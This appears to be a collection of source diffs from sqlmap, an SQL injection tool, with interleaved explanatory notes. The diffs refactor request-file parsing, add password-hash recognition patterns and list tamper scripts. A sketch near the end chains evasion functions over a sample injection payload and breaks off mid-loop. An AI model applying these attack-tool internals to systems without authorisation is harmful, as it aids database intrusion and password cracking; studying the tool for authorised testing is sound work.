||||||
|
"getSchema": CONTENT_TYPE.SCHEMA,
|
||||||
|
"getCount": CONTENT_TYPE.COUNT,
|
||||||
|
"dumpTable": CONTENT_TYPE.DUMP_TABLE,
|
||||||
|
"search": CONTENT_TYPE.SEARCH,
|
||||||
|
"sqlQuery": CONTENT_TYPE.SQL_QUERY,
|
||||||
|
"tableExists": CONTENT_TYPE.COMMON_TABLES,
|
||||||
|
"columnExists": CONTENT_TYPE.COMMON_COLUMNS,
|
||||||
|
"readFile": CONTENT_TYPE.FILE_READ,
|
||||||
|
"writeFile": CONTENT_TYPE.FILE_WRITE,
|
||||||
|
"osCmd": CONTENT_TYPE.OS_CMD,
|
||||||
|
"regRead": CONTENT_TYPE.REG_READ
|
||||||
|
}
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+See the file 'LICENSE' for copying permission
 """
 
 import cgi
@@ -46,6 +46,7 @@ from lib.core.settings import METADB_SUFFIX
 from lib.core.settings import MIN_BINARY_DISK_DUMP_SIZE
 from lib.core.settings import TRIM_STDOUT_DUMP_SIZE
 from lib.core.settings import UNICODE_ENCODING
+from lib.core.settings import UNSAFE_DUMP_FILEPATH_REPLACEMENT
 from lib.core.settings import WINDOWS_RESERVED_NAMES
 from thirdparty.magic import magic
 
@@ -140,7 +141,7 @@ class Dump(object):
 try:
 elements = set(elements)
 elements = list(elements)
-elements.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x)
+elements.sort(key=lambda _: _.lower() if isinstance(_, basestring) else _)
 except:
 pass
 
@@ -191,7 +192,7 @@ class Dump(object):
 userSettings = userSettings[0]
 
 users = userSettings.keys()
-users.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x)
+users.sort(key=lambda _: _.lower() if isinstance(_, basestring) else _)
 
 if conf.api:
 self._write(userSettings, content_type=content_type)
@@ -285,7 +286,7 @@ class Dump(object):
 colType = None
 
 colList = columns.keys()
-colList.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x)
+colList.sort(key=lambda _: _.lower() if isinstance(_, basestring) else _)
 
 for column in colList:
 colType = columns[column]
@@ -377,7 +378,7 @@ class Dump(object):
 if count is None:
 count = "Unknown"
 
-tables.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x)
+tables.sort(key=lambda _: _.lower() if isinstance(_, basestring) else _)
 
 for table in tables:
 blank1 = " " * (maxlength1 - len(normalizeUnicode(table) or unicode(table)))
@@ -414,16 +415,16 @@ class Dump(object):
 elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML):
 if not os.path.isdir(dumpDbPath):
 try:
-os.makedirs(dumpDbPath, 0755)
+os.makedirs(dumpDbPath)
 except:
 warnFile = True
 
-_ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(db)))
+_ = unicodeencode(re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, unsafeSQLIdentificatorNaming(db)))
 dumpDbPath = os.path.join(conf.dumpPath, "%s-%s" % (_, hashlib.md5(unicodeencode(db)).hexdigest()[:8]))
 
 if not os.path.isdir(dumpDbPath):
 try:
-os.makedirs(dumpDbPath, 0755)
+os.makedirs(dumpDbPath)
 except Exception, ex:
 try:
 tempDir = tempfile.mkdtemp(prefix="sqlmapdb")
@@ -441,7 +442,7 @@ class Dump(object):
 
 dumpDbPath = tempDir
 
-dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower()))
+dumpFileName = os.path.join(dumpDbPath, re.sub(r'[\\/]', UNSAFE_DUMP_FILEPATH_REPLACEMENT, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower())))
 if not checkFile(dumpFileName, False):
 try:
 openFile(dumpFileName, "w+b").close()
@@ -450,9 +451,9 @@ class Dump(object):
 except:
 warnFile = True
 
-_ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(table)))
+_ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, normalizeUnicode(unsafeSQLIdentificatorNaming(table)))
 if len(_) < len(table) or IS_WIN and table.upper() in WINDOWS_RESERVED_NAMES:
-_ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(table)))
+_ = unicodeencode(re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, unsafeSQLIdentificatorNaming(table)))
 dumpFileName = os.path.join(dumpDbPath, "%s-%s.%s" % (_, hashlib.md5(unicodeencode(table)).hexdigest()[:8], conf.dumpFormat.lower()))
 else:
 dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (_, conf.dumpFormat.lower()))
@@ -611,9 +612,9 @@ class Dump(object):
 mimetype = magic.from_buffer(value, mime=True)
 if any(mimetype.startswith(_) for _ in ("application", "image")):
 if not os.path.isdir(dumpDbPath):
-os.makedirs(dumpDbPath, 0755)
+os.makedirs(dumpDbPath)
 
-_ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(column)))
+_ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, normalizeUnicode(unsafeSQLIdentificatorNaming(column)))
 filepath = os.path.join(dumpDbPath, "%s-%d.bin" % (_, randomInt(8)))
 warnMsg = "writing binary ('%s') content to file '%s' " % (mimetype, filepath)
 logger.warn(warnMsg)
@@ -1,8 +1,8 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+See the file 'LICENSE' for copying permission
 """
 
 class PRIORITY:
@@ -22,6 +22,15 @@ class SORT_ORDER:
 FIFTH = 4
 LAST = 100
 
+# Reference: https://docs.python.org/2/library/logging.html#logging-levels
+class LOGGING_LEVELS:
+NOTSET = 0
+DEBUG = 10
+INFO = 20
+WARNING = 30
+ERROR = 40
+CRITICAL = 50
+
 class DBMS:
 ACCESS = "Microsoft Access"
 DB2 = "IBM DB2"
@@ -118,14 +127,30 @@ class HASH:
 MSSQL_OLD = r'(?i)\A0x0100[0-9a-f]{8}[0-9a-f]{80}\Z'
 MSSQL_NEW = r'(?i)\A0x0200[0-9a-f]{8}[0-9a-f]{128}\Z'
 ORACLE = r'(?i)\As:[0-9a-f]{60}\Z'
-ORACLE_OLD = r'(?i)\A[01-9a-f]{16}\Z'
+ORACLE_OLD = r'(?i)\A[0-9a-f]{16}\Z'
 MD5_GENERIC = r'(?i)\A[0-9a-f]{32}\Z'
 SHA1_GENERIC = r'(?i)\A[0-9a-f]{40}\Z'
-SHA224_GENERIC = r'(?i)\A[0-9a-f]{28}\Z'
+SHA224_GENERIC = r'(?i)\A[0-9a-f]{56}\Z'
-SHA384_GENERIC = r'(?i)\A[0-9a-f]{48}\Z'
+SHA256_GENERIC = r'(?i)\A[0-9a-f]{64}\Z'
-SHA512_GENERIC = r'(?i)\A[0-9a-f]{64}\Z'
+SHA384_GENERIC = r'(?i)\A[0-9a-f]{96}\Z'
-CRYPT_GENERIC = r'(?i)\A(?!\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\Z)(?![0-9]+\Z)[./0-9A-Za-z]{13}\Z'
+SHA512_GENERIC = r'(?i)\A[0-9a-f]{128}\Z'
-WORDPRESS = r'(?i)\A\$P\$[./0-9A-Za-z]{31}\Z'
+CRYPT_GENERIC = r'\A(?!\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\Z)(?![0-9]+\Z)[./0-9A-Za-z]{13}\Z'
+JOOMLA = r'\A[0-9a-f]{32}:\w{32}\Z'
+WORDPRESS = r'\A\$P\$[./0-9a-zA-Z]{31}\Z'
+APACHE_MD5_CRYPT = r'\A\$apr1\$.{1,8}\$[./a-zA-Z0-9]+\Z'
+UNIX_MD5_CRYPT = r'\A\$1\$.{1,8}\$[./a-zA-Z0-9]+\Z'
+APACHE_SHA1 = r'\A\{SHA\}[a-zA-Z0-9+/]+={0,2}\Z'
+VBULLETIN = r'\A[0-9a-fA-F]{32}:.{30}\Z'
+VBULLETIN_OLD = r'\A[0-9a-fA-F]{32}:.{3}\Z'
+SSHA = r'\A\{SSHA\}[a-zA-Z0-9+/]+={0,2}\Z'
+SSHA256 = r'\A\{SSHA256\}[a-zA-Z0-9+/]+={0,2}\Z'
+SSHA512 = r'\A\{SSHA512\}[a-zA-Z0-9+/]+={0,2}\Z'
+DJANGO_MD5 = r'\Amd5\$[^$]+\$[0-9a-f]{32}\Z'
+DJANGO_SHA1 = r'\Asha1\$[^$]+\$[0-9a-f]{40}\Z'
+MD5_BASE64 = r'\A[a-zA-Z0-9+/]{22}==\Z'
+SHA1_BASE64 = r'\A[a-zA-Z0-9+/]{27}=\Z'
+SHA256_BASE64 = r'\A[a-zA-Z0-9+/]{43}=\Z'
+SHA512_BASE64 = r'\A[a-zA-Z0-9+/]{86}==\Z'
 
 # Reference: http://www.zytrax.com/tech/web/mobile_ids.html
 class MOBILES:
@@ -184,6 +209,7 @@ class HTTP_HEADER:
 USER_AGENT = "User-Agent"
 VIA = "Via"
 X_POWERED_BY = "X-Powered-By"
+X_DATA_ORIGIN = "X-Data-Origin"
 
 class EXPECTED:
 BOOL = "bool"
@@ -216,40 +242,40 @@ class REDIRECTION:
 
 class PAYLOAD:
 SQLINJECTION = {
 1: "boolean-based blind",
 2: "error-based",
 3: "inline query",
 4: "stacked queries",
 5: "AND/OR time-based blind",
 6: "UNION query",
 }
 
 PARAMETER = {
 1: "Unescaped numeric",
 2: "Single quoted string",
 3: "LIKE single quoted string",
 4: "Double quoted string",
 5: "LIKE double quoted string",
 }
 
 RISK = {
 0: "No risk",
 1: "Low risk",
 2: "Medium risk",
 3: "High risk",
 }
 
 CLAUSE = {
 0: "Always",
 1: "WHERE",
 2: "GROUP BY",
 3: "ORDER BY",
 4: "LIMIT",
 5: "OFFSET",
 6: "TOP",
 7: "Table name",
 8: "Column name",
 }
 
 class METHOD:
 COMPARISON = "comparison"
@@ -314,34 +340,6 @@ class CONTENT_TYPE:
 OS_CMD = 24
 REG_READ = 25
 
-PART_RUN_CONTENT_TYPES = {
-"checkDbms": CONTENT_TYPE.TECHNIQUES,
-"getFingerprint": CONTENT_TYPE.DBMS_FINGERPRINT,
-"getBanner": CONTENT_TYPE.BANNER,
-"getCurrentUser": CONTENT_TYPE.CURRENT_USER,
-"getCurrentDb": CONTENT_TYPE.CURRENT_DB,
-"getHostname": CONTENT_TYPE.HOSTNAME,
-"isDba": CONTENT_TYPE.IS_DBA,
-"getUsers": CONTENT_TYPE.USERS,
-"getPasswordHashes": CONTENT_TYPE.PASSWORDS,
-"getPrivileges": CONTENT_TYPE.PRIVILEGES,
-"getRoles": CONTENT_TYPE.ROLES,
-"getDbs": CONTENT_TYPE.DBS,
-"getTables": CONTENT_TYPE.TABLES,
-"getColumns": CONTENT_TYPE.COLUMNS,
-"getSchema": CONTENT_TYPE.SCHEMA,
-"getCount": CONTENT_TYPE.COUNT,
-"dumpTable": CONTENT_TYPE.DUMP_TABLE,
-"search": CONTENT_TYPE.SEARCH,
-"sqlQuery": CONTENT_TYPE.SQL_QUERY,
-"tableExists": CONTENT_TYPE.COMMON_TABLES,
-"columnExists": CONTENT_TYPE.COMMON_COLUMNS,
-"readFile": CONTENT_TYPE.FILE_READ,
-"writeFile": CONTENT_TYPE.FILE_WRITE,
-"osCmd": CONTENT_TYPE.OS_CMD,
-"regRead": CONTENT_TYPE.REG_READ
-}
-
 class CONTENT_STATUS:
 IN_PROGRESS = 0
 COMPLETE = 1
@@ -356,6 +354,7 @@ class AUTOCOMPLETE_TYPE:
 SQL = 0
 OS = 1
 SQLMAP = 2
+API = 3
 
 class NOTE:
 FALSE_POSITIVE_OR_UNEXPLOITABLE = "false positive or unexploitable"
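Note: the HASH constants added above are plain anchored regular expressions. As a rough illustration (not part of the diff), a handful of such patterns can be used to classify a credential string; the function name and the sample value below are assumptions chosen for the example:

import re

# Illustrative subset of the anchored hash patterns from the class above
HASH_PATTERNS = {
    "MD5_GENERIC": r'(?i)\A[0-9a-f]{32}\Z',
    "SHA1_GENERIC": r'(?i)\A[0-9a-f]{40}\Z',
    "JOOMLA": r'\A[0-9a-f]{32}:\w{32}\Z',
    "WORDPRESS": r'\A\$P\$[./0-9a-zA-Z]{31}\Z',
}

def classify_hash(value):
    # Return the first matching format name, or None when nothing matches
    for name, pattern in HASH_PATTERNS.items():
        if re.search(pattern, value):
            return name
    return None

print(classify_hash("5f4dcc3b5aa765d61d8327deb882cf99"))  # MD5_GENERIC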
@@ -1,8 +1,8 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+See the file 'LICENSE' for copying permission
 """
 
 class SqlmapBaseException(Exception):
@@ -1,8 +1,8 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+See the file 'LICENSE' for copying permission
 """
 
 import logging
lib/core/option.py (437 changes, Executable file → Normal file)
@@ -1,16 +1,14 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+See the file 'LICENSE' for copying permission
 """
 
-import binascii
 import cookielib
 import glob
 import inspect
 import logging
-import httplib
 import os
 import random
 import re
@@ -37,17 +35,15 @@ from lib.core.common import checkFile
 from lib.core.common import dataToStdout
 from lib.core.common import getPublicTypeMembers
 from lib.core.common import getSafeExString
-from lib.core.common import extractRegexResult
-from lib.core.common import filterStringValue
 from lib.core.common import findLocalPort
 from lib.core.common import findPageForms
 from lib.core.common import getConsoleWidth
 from lib.core.common import getFileItems
 from lib.core.common import getFileType
-from lib.core.common import getUnicode
 from lib.core.common import normalizePath
 from lib.core.common import ntToPosixSlashes
 from lib.core.common import openFile
+from lib.core.common import parseRequestFile
 from lib.core.common import parseTargetDirect
 from lib.core.common import parseTargetUrl
 from lib.core.common import paths
@@ -58,6 +54,7 @@ from lib.core.common import resetCookieJar
 from lib.core.common import runningAsAdmin
 from lib.core.common import safeExpandUser
 from lib.core.common import saveConfig
+from lib.core.common import setColor
 from lib.core.common import setOptimize
 from lib.core.common import setPaths
 from lib.core.common import singleTimeWarnMessage
@@ -100,10 +97,7 @@ from lib.core.exception import SqlmapUnsupportedDBMSException
 from lib.core.exception import SqlmapUserQuitException
 from lib.core.log import FORMATTER
 from lib.core.optiondict import optDict
-from lib.core.settings import BURP_REQUEST_REGEX
-from lib.core.settings import BURP_XML_HISTORY_REGEX
 from lib.core.settings import CODECS_LIST_PAGE
-from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS
 from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
 from lib.core.settings import DBMS_ALIASES
 from lib.core.settings import DEFAULT_PAGE_ENCODING
@@ -120,7 +114,6 @@ from lib.core.settings import MAX_NUMBER_OF_THREADS
 from lib.core.settings import NULL
 from lib.core.settings import PARAMETER_SPLITTING_REGEX
 from lib.core.settings import PRECONNECT_CANDIDATE_TIMEOUT
-from lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS
 from lib.core.settings import SITE
 from lib.core.settings import SOCKET_PRE_CONNECT_QUEUE_SIZE
 from lib.core.settings import SQLMAP_ENVIRONMENT_PREFIX
@@ -132,7 +125,6 @@ from lib.core.settings import UNION_CHAR_REGEX
 from lib.core.settings import UNKNOWN_DBMS_VERSION
 from lib.core.settings import URI_INJECTABLE_REGEX
 from lib.core.settings import VERSION_STRING
-from lib.core.settings import WEBSCARAB_SPLITTER
 from lib.core.threads import getCurrentThreadData
 from lib.core.threads import setDaemon
 from lib.core.update import update
@@ -174,201 +166,6 @@ try:
 except NameError:
 WindowsError = None
 
-def _feedTargetsDict(reqFile, addedTargetUrls):
-"""
-Parses web scarab and burp logs and adds results to the target URL list
-"""
-
-def _parseWebScarabLog(content):
-"""
-Parses web scarab logs (POST method not supported)
-"""
-
-reqResList = content.split(WEBSCARAB_SPLITTER)
-
-for request in reqResList:
-url = extractRegexResult(r"URL: (?P<result>.+?)\n", request, re.I)
-method = extractRegexResult(r"METHOD: (?P<result>.+?)\n", request, re.I)
-cookie = extractRegexResult(r"COOKIE: (?P<result>.+?)\n", request, re.I)
-
-if not method or not url:
-logger.debug("not a valid WebScarab log data")
-continue
-
-if method.upper() == HTTPMETHOD.POST:
-warnMsg = "POST requests from WebScarab logs aren't supported "
-warnMsg += "as their body content is stored in separate files. "
-warnMsg += "Nevertheless you can use -r to load them individually."
-logger.warning(warnMsg)
-continue
-
-if not(conf.scope and not re.search(conf.scope, url, re.I)):
-if not kb.targets or url not in addedTargetUrls:
-kb.targets.add((url, method, None, cookie, None))
-addedTargetUrls.add(url)
-
-def _parseBurpLog(content):
-"""
-Parses burp logs
-"""
-
-if not re.search(BURP_REQUEST_REGEX, content, re.I | re.S):
-if re.search(BURP_XML_HISTORY_REGEX, content, re.I | re.S):
-reqResList = []
-for match in re.finditer(BURP_XML_HISTORY_REGEX, content, re.I | re.S):
-port, request = match.groups()
-try:
-request = request.decode("base64")
-except binascii.Error:
-continue
-_ = re.search(r"%s:.+" % re.escape(HTTP_HEADER.HOST), request)
-if _:
-host = _.group(0).strip()
-if not re.search(r":\d+\Z", host):
-request = request.replace(host, "%s:%d" % (host, int(port)))
-reqResList.append(request)
-else:
-reqResList = [content]
-else:
-reqResList = re.finditer(BURP_REQUEST_REGEX, content, re.I | re.S)
-
-for match in reqResList:
-request = match if isinstance(match, basestring) else match.group(0)
-request = re.sub(r"\A[^\w]+", "", request)
-
-schemePort = re.search(r"(http[\w]*)\:\/\/.*?\:([\d]+).+?={10,}", request, re.I | re.S)
-
-if schemePort:
-scheme = schemePort.group(1)
-port = schemePort.group(2)
-request = re.sub(r"\n=+\Z", "", request.split(schemePort.group(0))[-1].lstrip())
-else:
-scheme, port = None, None
-
-if not re.search(r"^[\n]*(%s).*?\sHTTP\/" % "|".join(getPublicTypeMembers(HTTPMETHOD, True)), request, re.I | re.M):
-continue
-
-if re.search(r"^[\n]*%s.*?\.(%s)\sHTTP\/" % (HTTPMETHOD.GET, "|".join(CRAWL_EXCLUDE_EXTENSIONS)), request, re.I | re.M):
-continue
-
-getPostReq = False
-url = None
-host = None
-method = None
-data = None
-cookie = None
-params = False
-newline = None
-lines = request.split('\n')
-headers = []
-
-for index in xrange(len(lines)):
-line = lines[index]
-
-if not line.strip() and index == len(lines) - 1:
-break
-
-newline = "\r\n" if line.endswith('\r') else '\n'
-line = line.strip('\r')
-match = re.search(r"\A(%s) (.+) HTTP/[\d.]+\Z" % "|".join(getPublicTypeMembers(HTTPMETHOD, True)), line) if not method else None
-
-if len(line.strip()) == 0 and method and method != HTTPMETHOD.GET and data is None:
-data = ""
-params = True
-
-elif match:
-method = match.group(1)
-url = match.group(2)
-
-if any(_ in line for _ in ('?', '=', kb.customInjectionMark)):
-params = True
-
-getPostReq = True
-
-# POST parameters
-elif data is not None and params:
-data += "%s%s" % (line, newline)
-
-# GET parameters
-elif "?" in line and "=" in line and ": " not in line:
-params = True
-
-# Headers
-elif re.search(r"\A\S+:", line):
-key, value = line.split(":", 1)
-value = value.strip().replace("\r", "").replace("\n", "")
-
-# Cookie and Host headers
-if key.upper() == HTTP_HEADER.COOKIE.upper():
-cookie = value
-elif key.upper() == HTTP_HEADER.HOST.upper():
-if '://' in value:
-scheme, value = value.split('://')[:2]
-splitValue = value.split(":")
-host = splitValue[0]
-
-if len(splitValue) > 1:
-port = filterStringValue(splitValue[1], "[0-9]")
-
-# Avoid to add a static content length header to
-# headers and consider the following lines as
-# POSTed data
-if key.upper() == HTTP_HEADER.CONTENT_LENGTH.upper():
-params = True
-
-# Avoid proxy and connection type related headers
-elif key not in (HTTP_HEADER.PROXY_CONNECTION, HTTP_HEADER.CONNECTION):
-headers.append((getUnicode(key), getUnicode(value)))
-
-if kb.customInjectionMark in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or ""):
-params = True
-
-data = data.rstrip("\r\n") if data else data
-
-if getPostReq and (params or cookie):
-if not port and isinstance(scheme, basestring) and scheme.lower() == "https":
-port = "443"
-elif not scheme and port == "443":
-scheme = "https"
-
-if conf.forceSSL:
-scheme = "https"
-port = port or "443"
-
-if not host:
-errMsg = "invalid format of a request file"
-raise SqlmapSyntaxException, errMsg
-
-if not url.startswith("http"):
-url = "%s://%s:%s%s" % (scheme or "http", host, port or "80", url)
-scheme = None
-port = None
-
-if not(conf.scope and not re.search(conf.scope, url, re.I)):
-if not kb.targets or url not in addedTargetUrls:
-kb.targets.add((url, conf.method or method, data, cookie, tuple(headers)))
-addedTargetUrls.add(url)
-
-checkFile(reqFile)
-try:
-with openFile(reqFile, "rb") as f:
-content = f.read()
-except (IOError, OSError, MemoryError), ex:
-errMsg = "something went wrong while trying "
-errMsg += "to read the content of file '%s' ('%s')" % (reqFile, getSafeExString(ex))
-raise SqlmapSystemException(errMsg)
-
-if conf.scope:
-logger.info("using regular expression '%s' for filtering targets" % conf.scope)
-
-_parseBurpLog(content)
-_parseWebScarabLog(content)
-
-if not addedTargetUrls:
-errMsg = "unable to find usable request(s) "
-errMsg += "in provided file ('%s')" % reqFile
-raise SqlmapGenericException(errMsg)
-
 def _loadQueries():
 """
 Loads queries from 'xml/queries.xml' file.
@@ -402,7 +199,7 @@ def _loadQueries():
 errMsg = "something appears to be wrong with "
 errMsg += "the file '%s' ('%s'). Please make " % (paths.QUERIES_XML, getSafeExString(ex))
 errMsg += "sure that you haven't made any changes to it"
-raise SqlmapInstallationException, errMsg
+raise SqlmapInstallationException(errMsg)
 
 for node in tree.findall("*"):
 queries[node.attrib['value']] = iterate(node)
@@ -414,7 +211,7 @@ def _setMultipleTargets():
 """
 
 initialTargetsCount = len(kb.targets)
-addedTargetUrls = set()
+seen = set()
 
 if not conf.logFile:
 return
@@ -427,17 +224,25 @@ def _setMultipleTargets():
 raise SqlmapFilePathException(errMsg)
 
 if os.path.isfile(conf.logFile):
-_feedTargetsDict(conf.logFile, addedTargetUrls)
+for target in parseRequestFile(conf.logFile):
+url = target[0]
+if url not in seen:
+kb.targets.add(target)
+seen.add(url)
 
 elif os.path.isdir(conf.logFile):
 files = os.listdir(conf.logFile)
 files.sort()
 
 for reqFile in files:
-if not re.search("([\d]+)\-request", reqFile):
+if not re.search(r"([\d]+)\-request", reqFile):
 continue
 
-_feedTargetsDict(os.path.join(conf.logFile, reqFile), addedTargetUrls)
+for target in parseRequestFile(os.path.join(conf.logFile, reqFile)):
+url = target[0]
+if url not in seen:
+kb.targets.add(target)
+seen.add(url)
 
 else:
 errMsg = "the specified list of targets is not a file "
@@ -478,22 +283,37 @@ def _setRequestFromFile():
 textual file, parses it and saves the information into the knowledge base.
 """
 
-if not conf.requestFile:
+if conf.requestFile:
-return
+conf.requestFile = safeExpandUser(conf.requestFile)
+seen = set()
 
-addedTargetUrls = set()
+if not os.path.isfile(conf.requestFile):
+errMsg = "specified HTTP request file '%s' " % conf.requestFile
+errMsg += "does not exist"
+raise SqlmapFilePathException(errMsg)
 
-conf.requestFile = safeExpandUser(conf.requestFile)
+infoMsg = "parsing HTTP request from '%s'" % conf.requestFile
+logger.info(infoMsg)
 
-if not os.path.isfile(conf.requestFile):
+for target in parseRequestFile(conf.requestFile):
-errMsg = "specified HTTP request file '%s' " % conf.requestFile
+url = target[0]
-errMsg += "does not exist"
+if url not in seen:
-raise SqlmapFilePathException(errMsg)
+kb.targets.add(target)
+seen.add(url)
 
-infoMsg = "parsing HTTP request from '%s'" % conf.requestFile
+if conf.secondReq:
-logger.info(infoMsg)
+conf.secondReq = safeExpandUser(conf.secondReq)
 
-_feedTargetsDict(conf.requestFile, addedTargetUrls)
+if not os.path.isfile(conf.secondReq):
+errMsg = "specified second-order HTTP request file '%s' " % conf.secondReq
+errMsg += "does not exist"
+raise SqlmapFilePathException(errMsg)
+
+infoMsg = "parsing second-order HTTP request from '%s'" % conf.secondReq
+logger.info(infoMsg)
+
+target = parseRequestFile(conf.secondReq, False).next()
+kb.secondReq = target
 
 def _setCrawler():
 if not conf.crawlDepth:
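Note: the hunks above replace the former inlined log parsing with the shared parseRequestFile() helper and de-duplicate parsed targets by URL before adding them to kb.targets. A minimal sketch of that de-duplication pattern, with a stand-in generator instead of the real helper:

def parse_request_file(path):
    # Stand-in: the real parseRequestFile() yields (url, method, data, cookie, headers) tuples
    yield ("http://example.com/?id=1", "GET", None, None, ())
    yield ("http://example.com/?id=1", "GET", None, None, ())  # duplicate URL, should be skipped
    yield ("http://example.com/login", "POST", "user=admin", None, ())

targets = set()
seen = set()

for target in parse_request_file("dummy.txt"):
    url = target[0]
    if url not in seen:  # keep only the first target seen for each URL
        targets.add(target)
        seen.add(url)

print(len(targets))  # 2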
@@ -666,7 +486,7 @@ def _setDBMSAuthentication():
 debugMsg = "setting the DBMS authentication credentials"
 logger.debug(debugMsg)
 
-match = re.search("^(.+?):(.*?)$", conf.dbmsCred)
+match = re.search(r"^(.+?):(.*?)$", conf.dbmsCred)
 
 if not match:
 errMsg = "DBMS authentication credentials value must be in format "
@@ -687,12 +507,12 @@ def _setMetasploit():
 
 if IS_WIN:
 try:
-import win32file
+__import__("win32file")
 except ImportError:
 errMsg = "sqlmap requires third-party module 'pywin32' "
 errMsg += "in order to use Metasploit functionalities on "
 errMsg += "Windows. You can download it from "
-errMsg += "'http://sourceforge.net/projects/pywin32/files/pywin32/'"
+errMsg += "'https://sourceforge.net/projects/pywin32/files/pywin32/'"
 raise SqlmapMissingDependence(errMsg)
 
 if not conf.msfPath:
@@ -700,7 +520,7 @@ def _setMetasploit():
 retVal = None
 
 try:
 from _winreg import ConnectRegistry, OpenKey, QueryValueEx, HKEY_LOCAL_MACHINE
 _ = ConnectRegistry(None, HKEY_LOCAL_MACHINE)
 _ = OpenKey(_, key)
 retVal = QueryValueEx(_, value)[0]
@@ -784,7 +604,7 @@ def _setMetasploit():
 
 if not msfEnvPathExists:
 errMsg = "unable to locate Metasploit Framework installation. "
-errMsg += "You can get it at 'http://www.metasploit.com/download/'"
+errMsg += "You can get it at 'https://www.metasploit.com/download/'"
 raise SqlmapFilePathException(errMsg)
 
 def _setWriteFile():
@@ -861,7 +681,7 @@ def _setDBMS():
 logger.debug(debugMsg)
 
 conf.dbms = conf.dbms.lower()
-regex = re.search("%s ([\d\.]+)" % ("(%s)" % "|".join([alias for alias in SUPPORTED_DBMS])), conf.dbms, re.I)
+regex = re.search(r"%s ([\d\.]+)" % ("(%s)" % "|".join([alias for alias in SUPPORTED_DBMS])), conf.dbms, re.I)
 
 if regex:
 conf.dbms = regex.group(1)
@@ -880,6 +700,22 @@ def _setDBMS():
 
 break
 
+def _listTamperingFunctions():
+"""
+Lists available tamper functions
+"""
+
+if conf.listTampers:
+infoMsg = "listing available tamper scripts\n"
+logger.info(infoMsg)
+
+for script in sorted(glob.glob(os.path.join(paths.SQLMAP_TAMPER_PATH, "*.py"))):
+content = openFile(script, "rb").read()
+match = re.search(r'(?s)__priority__.+"""(.+)"""', content)
+if match:
+comment = match.group(1).strip()
+dataToStdout("* %s - %s\n" % (setColor(os.path.basename(script), "yellow"), re.sub(r" *\n *", " ", comment.split("\n\n")[0].strip())))
+
 def _setTamperingFunctions():
 """
 Loads tampering functions from given script(s)
@@ -918,7 +754,7 @@ def _setTamperingFunctions():
 dirname, filename = os.path.split(script)
 dirname = os.path.abspath(dirname)
 
-infoMsg = "loading tamper script '%s'" % filename[:-3]
+infoMsg = "loading tamper module '%s'" % filename[:-3]
 logger.info(infoMsg)
 
 if not os.path.exists(os.path.join(dirname, "__init__.py")):
@@ -931,8 +767,8 @@ def _setTamperingFunctions():
 
 try:
 module = __import__(filename[:-3].encode(sys.getfilesystemencoding() or UNICODE_ENCODING))
-except (ImportError, SyntaxError), ex:
+except Exception, ex:
-raise SqlmapSyntaxException("cannot import tamper script '%s' (%s)" % (filename[:-3], getSafeExString(ex)))
+raise SqlmapSyntaxException("cannot import tamper module '%s' (%s)" % (filename[:-3], getSafeExString(ex)))
 
 priority = PRIORITY.NORMAL if not hasattr(module, "__priority__") else module.__priority__
 
@@ -962,7 +798,12 @@ def _setTamperingFunctions():
 
 break
 elif name == "dependencies":
-function()
+try:
+function()
+except Exception, ex:
+errMsg = "error occurred while checking dependencies "
+errMsg += "for tamper module '%s' ('%s')" % (filename[:-3], getSafeExString(ex))
+raise SqlmapGenericException(errMsg)
 
 if not found:
 errMsg = "missing function 'tamper(payload, **kwargs)' "
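Note: tamper modules expose an optional __priority__ attribute and a tamper(payload, **kwargs) function; the hunks above only change how such modules are imported and how their dependency checks are reported. A small, hypothetical sketch of chaining tamper-style callables ordered by a priority value (the module objects and the ordering direction are assumptions for illustration, not sqlmap's exact behaviour):

class FakeTamperModule(object):
    # Stand-in for an imported tamper module
    def __init__(self, name, priority, func):
        self.__name__ = name
        self.__priority__ = priority
        self.tamper = func

modules = [
    FakeTamperModule("space2comment", 1, lambda payload: payload.replace(" ", "/**/")),
    FakeTamperModule("uppercase", 0, lambda payload: payload.upper()),
]

payload = "1 AND 1=1"
for module in sorted(modules, key=lambda m: m.__priority__):
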